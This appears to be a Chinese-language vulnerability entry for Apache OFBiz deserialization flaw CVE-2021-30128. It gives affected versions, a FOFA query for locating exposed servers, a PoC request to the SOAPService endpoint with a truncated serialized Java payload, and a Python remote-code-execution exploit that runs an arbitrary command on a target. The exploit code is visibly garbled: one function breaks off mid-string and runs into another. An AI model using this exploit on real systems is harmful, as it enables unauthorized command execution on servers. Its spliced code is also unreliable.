# Apache OFBiz 反序列化 CVE-2021-30128
## 漏洞描述
Ofbiz(Open for business)是一个开源的,基于J2EE和XML规范的,用于构建大型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架(Framework)。
参考链接:
- 阿里云分析:https://mp.weixin.qq.com/s/Dr-jwiRr4NByjErjiX_e1w
- r0cky:https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
- https://github.com/r0ckysec/CVE-2021-30128
- https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
## 漏洞影响
```
Apache OFBiz < 17.12.07
```
## FOFA
```
app="Apache_OFBiz"
```
## 漏洞复现
poc:
```
POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.80.145:8443
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 6093
ACED0005 ... ... 871007E000D78
```
exp:
```py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/3/24-15:09
"""
import subprocess
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print("""
===================================================
____ ______ ____ _ ________ _______
/ __ \| ____| _ \(_) | ____\ \ / / __ \
| | | | |__ | |_) |_ ____ | |__ \ V /| |__) |
| | | | __| | _ <| |_ / | __| > < | ___/
| |__| | | | |_) | |/ / | |____ / . \| |
\____/|_| |____/|_/___| |______/_/ \_\_|
CVE-2021-30128 Powered by r0cky
===================================================
""")
def bypass(payload):
className = ['org.apache.commons.beanutils.BeanComparator', 'org.apache.commons.collections.comparators.ComparableComparator', 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl']
for cn in className:
len_hex = hex(len(cn)).replace('0x','').upper()
className_hex = cn.encode().hex().upper()
bypass_className = cn + '
{}
""".format(post_data)
print("[+] payload sending...")
r = requests.post(url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[+] send payload success.")
print()
print("[END] Apache OFBiz RCE Done.")
else:
print("[-] send payload failed.")
print()
print("[END] Apache OFBiz RCE failed.")
headers={"Content-Type": "text/xml"}
if __name__ == '__main__':
banner()
try:
target = sys.argv[1]
cmd = sys.argv[2]
# target = "https://192.168.80.136:8443"
# vps_ip = "10.20.28.16"
# vps_port = "9999"
url = "{}/webtools/control/SOAPService".format(target)
exp(url, cmd)
except:
print("Example: \n\tpython3 " + sys.argv[0] + " \n")
```